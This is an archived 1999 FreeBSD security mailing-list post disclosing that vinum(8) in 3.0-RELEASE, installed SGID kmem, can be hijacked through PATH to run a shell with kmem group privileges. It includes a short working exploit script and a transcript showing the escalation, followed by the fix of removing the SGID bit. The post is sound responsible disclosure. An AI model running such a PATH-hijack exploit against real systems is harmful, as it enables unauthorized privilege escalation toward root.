Date: Wed, 27 Jan 1999 10:50:39 -0700 (MST) From: Paul Hart <hart@iserver.com> To: freebsd-security@FreeBSD.ORG Subject: Large security hole in vinum(8) in 3.0-RELEASE Message-ID: <Pine.BSF.3.96.990127103410.19271A-100000@anchovy.orem.iserver.com>
next in thread | raw e-mail | index | archive | help
On January 13, 1999 (two weeks ago), I notified the FreeBSD security officer and the author of vinum(8) of a large security hole that affects vinum(8) in 3.0-RELEASE. It seems appropriate to disclose this hole now in a public forum, seeing as the author has corrected the problem. In at least 3.0-RELEASE /sbin/vinum is SGID kmem and can be leveraged to run arbitrary code with an EGID of kmem. Now this not as bad of a hole as say a root compromise, but it can lead to a number of serious local attacks against a FreeBSD host, such as examining contents of /dev/mem or /dev/kmem, which could in turn be leveraged for root access. Here is a transcript of what I mean: % uname -r 3.0-RELEASE % id uid=100(hart) gid=100(hart) groups=100(hart), 0(wheel) % ./vino $ id uid=100(hart) gid=100(hart) egid=2(kmem) groups=2(kmem), 100(hart), 0(wheel) $ Whoops! My sample exploit code (vino) is: #!/bin/sh PATH=/tmp:$PATH echo "#!/bin/sh exec /bin/sh" > /tmp/mkdir chmod 755 /tmp/mkdir /sbin/vinum Looking through the code to vinum(8), the problem can be traced to the dangerous use of system(3) in a privileged program. But as it turns out, vinum(8) doesn't need to be SGID. From discussion with the author, this installation mode appears to have crept into the vinum(8) Makefile from the Makefile for ccdconfig(8) by accident. So this turns out to be easy to fix -- simply remove the SGID bit from /sbin/vinum. Paul Hart -- Paul Robert Hart ><8> ><8> ><8> Verio Web Hosting, Inc. hart@iserver.com ><8> ><8> ><8> http://www.iserver.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.BSF.3.96.990127103410.19271A-100000>